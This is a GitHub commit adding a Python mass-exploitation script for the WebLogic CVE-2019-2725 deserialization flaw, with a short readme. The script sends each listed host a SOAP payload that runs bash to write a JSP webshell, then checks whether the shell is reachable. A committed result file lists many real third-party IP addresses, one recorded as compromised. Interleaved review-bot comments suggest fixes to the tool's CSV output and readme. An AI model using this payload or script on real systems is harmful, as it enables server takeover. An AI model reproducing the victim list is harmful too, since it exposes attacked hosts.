CVE-2019-2725

No4l committed Apr 28, 2019
1 parent d2961f7 commit 9943385596143ac9e906354a7c1b42b5570e669f
Showing with 127 additions and 0 deletions.
  1. +1 −0 CVE-2019-2725/domain.txt
  2. +116 −0 CVE-2019-2725/main.py
  3. +7 −0 CVE-2019-2725/readme.md
  4. +1 −0 CVE-2019-2725/result.csv
  5. +2 −0 readme.txt
@@ -0,0 +1 @@
http://www.baidu.com
@@ -0,0 +1,116 @@
# -*- coding: utf-8 -*-
#!/usr/bin/env python3
from time import sleep
import threading
import requests
import sys

##存在漏洞的路径,如果存在该路径则很大可能存在漏洞
Path = '/_async/AsyncResponseService'
WebSehll = '/_async/webshells.jsp'

##Payload
Headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0',
'Content-Type': 'text/xml'
}

Data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>echo 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 |base64 -d > servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshells.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>'''


def printInfo():
print('Usage: Python main.py filename')

def urlHeadle(url):
if url.find('http')==0:
return url.strip()
else:
return 'http://'+url.strip()

def start(file):
urls = []
with open(file) as f:
for i in f.readlines():
urls.append(urlHeadle(i))
threads = []
for i in urls:
t = threading.Thread(target=run,args=(i,))
threads.append(t)

for t in threads:
t.setDaemon(True)
t.start()
sleep(0.5)

t.join()

def run(url):
try:
res = requests.get(url+Path,timeout=1)
status = res.status_code
except:
status = 'XXX'

if status != 200:
message = '[-]'+url+' may be not available,response code: '+str(status)
print(message)
else:
try:
res = requests.post(url+Path,data=Data,headers=Headers,timeout=1)
except:
status = 'XXX'
message = 'put webshell error'
if status == 'XXX':
print('[-]'+url,message)
else:
try:
res = requests.get(url+WebSehll,timeout=1)
status = res.status_code
except:
status = 'XXX'
message = 'connect error'
if status == 200:
message = 'congratulations get shell'
print('[+]'+url,message)
else:
print('[-]'+url,message)
with open('result.csv','a') as wf:
wf.write(url+','+message+','+str(status))





if __name__ == '__main__':
try:
file = sys.argv[1]
except:
printInfo()
exit()

start(file)


# requests.post(i.strip()+Path,data=Data,headers=Headers)
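Review bot: At the end of run(), `wf.write(url+','+message+','+str(status))` writes no line terminator and does no CSV quoting, so every record is appended to the same line and the file cannot be parsed back into rows; write each row with `csv.writer(wf).writerow([url, message, status])` instead. In the non-200 branch, `message` is already built as `'[-]'+url+' may be not available,...'`, so the URL lands in the row twice and the embedded comma adds an extra column. Separately, `#!/usr/bin/env python3` is on the second line, where it has no effect as a shebang; it has to be the first line of the file, with the coding line after it.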
@@ -0,0 +1,7 @@
### CVE-2019-2725
Weblogic wls9_async_response 反序列化RCE
```cmd
usage:
python main.py domain.txt
```
结果保存在result.csv中
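Review bot: The readme gives only the invocation and where the results are saved; it does not say that main.py goes beyond checking for `/_async/AsyncResponseService` and writes `webshells.jsp` on each host listed in the input file, nor that the script depends on `requests`. State both, and link Oracle's security alert for CVE-2019-2725 so a reader can find the fix. The `usage:` label also belongs outside the fenced block so that the fence holds only the command.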
@@ -0,0 +1 @@
http://47.106.125.183:7001,congratulations get shell,200http://211.140.178.45:8443,[-]http://211.140.178.45:8443 may be not available,response code: XXX,XXXhttp://211.140.178.29:8443,[-]http://211.140.178.29:8443 may be not available,response code: 404,404http://211.140.178.34:8443,[-]http://211.140.178.34:8443 may be not available,response code: 404,404http://211.140.178.41:8443,[-]http://211.140.178.41:8443 may be not available,response code: 404,404http://211.140.178.45:8443,[-]http://211.140.178.45:8443 may be not available,response code: XXX,XXXhttp://211.140.178.47:8443,[-]http://211.140.178.47:8443 may be not available,response code: 404,404http://211.140.178.48:8443,[-]http://211.140.178.48:8443 may be not available,response code: 404,404http://211.140.178.52:8443,[-]http://211.140.178.52:8443 may be not available,response code: 404,404http://211.140.178.58:8443,[-]http://211.140.178.58:8443 may be not available,response code: 404,404http://211.140.178.6:8443,[-]http://211.140.178.6:8443 may be not available,response code: 404,404http://211.140.178.60:8443,[-]http://211.140.178.60:8443 may be not available,response code: 404,404http://211.140.178.61:8443,[-]http://211.140.178.61:8443 may be not available,response code: 404,404http://211.140.178.64:8443,[-]http://211.140.178.64:8443 may be not available,response code: 404,404http://211.140.178.67:8443,[-]http://211.140.178.67:8443 may be not available,response code: 404,404http://211.140.178.74:8443,[-]http://211.140.178.74:8443 may be not available,response code: 404,404http://211.140.179.101:8443,[-]http://211.140.179.101:8443 may be not available,response code: 404,404http://211.140.179.117:8443,[-]http://211.140.179.117:8443 may be not available,response code: 404,404http://211.140.179.12:8443,[-]http://211.140.179.12:8443 may be not available,response code: 404,404http://211.140.179.120:8443,[-]http://211.140.179.120:8443 may be not available,response code: 
404,404http://211.140.179.124:8443,[-]http://211.140.179.124:8443 may be not available,response code: 404,404http://211.140.179.129:8443,[-]http://211.140.179.129:8443 may be not available,response code: 404,404http://211.140.179.140:8443,[-]http://211.140.179.140:8443 may be not available,response code: 404,404http://211.140.179.141:8443,[-]http://211.140.179.141:8443 may be not available,response code: 404,404http://211.140.179.145:8443,[-]http://211.140.179.145:8443 may be not available,response code: 404,404http://211.140.179.147:8443,[-]http://211.140.179.147:8443 may be not available,response code: 404,404http://211.140.179.153:8443,[-]http://211.140.179.153:8443 may be not available,response code: 404,404http://211.140.179.160:8443,[-]http://211.140.179.160:8443 may be not available,response code: 404,404http://211.140.179.177:8443,[-]http://211.140.179.177:8443 may be not available,response code: 404,404http://211.140.179.187:8443,[-]http://211.140.179.187:8443 may be not available,response code: 404,404http://211.140.179.189:8443,[-]http://211.140.179.189:8443 may be not available,response code: 404,404http://211.140.179.19:8443,[-]http://211.140.179.19:8443 may be not available,response code: 404,404http://211.140.179.191:8443,[-]http://211.140.179.191:8443 may be not available,response code: 404,404http://211.140.179.192:8443,[-]http://211.140.179.192:8443 may be not available,response code: 404,404http://211.140.179.199:8443,[-]http://211.140.179.199:8443 may be not available,response code: 404,404http://211.140.179.203:8443,[-]http://211.140.179.203:8443 may be not available,response code: 404,404http://211.140.179.205:8443,[-]http://211.140.179.205:8443 may be not available,response code: 404,404http://211.140.179.206:8443,[-]http://211.140.179.206:8443 may be not available,response code: 404,404http://59.16.120.55:7001,[-]http://59.16.120.55:7001 may be not available,response code: XXX,XXX
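Review bot: result.csv is output generated by a run of main.py, not source, and the committed copy records third-party host addresses together with the outcome for each; drop it from the commit and add `result.csv` to .gitignore. If the readme needs a sample of the output format, use a constructed row with a documentation address such as 192.0.2.10.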
@@ -20,3 +20,5 @@ CNVD:
指纹识别,add error json
2019/4/27
Web Title
2019/4/28
CVE-2019-2725
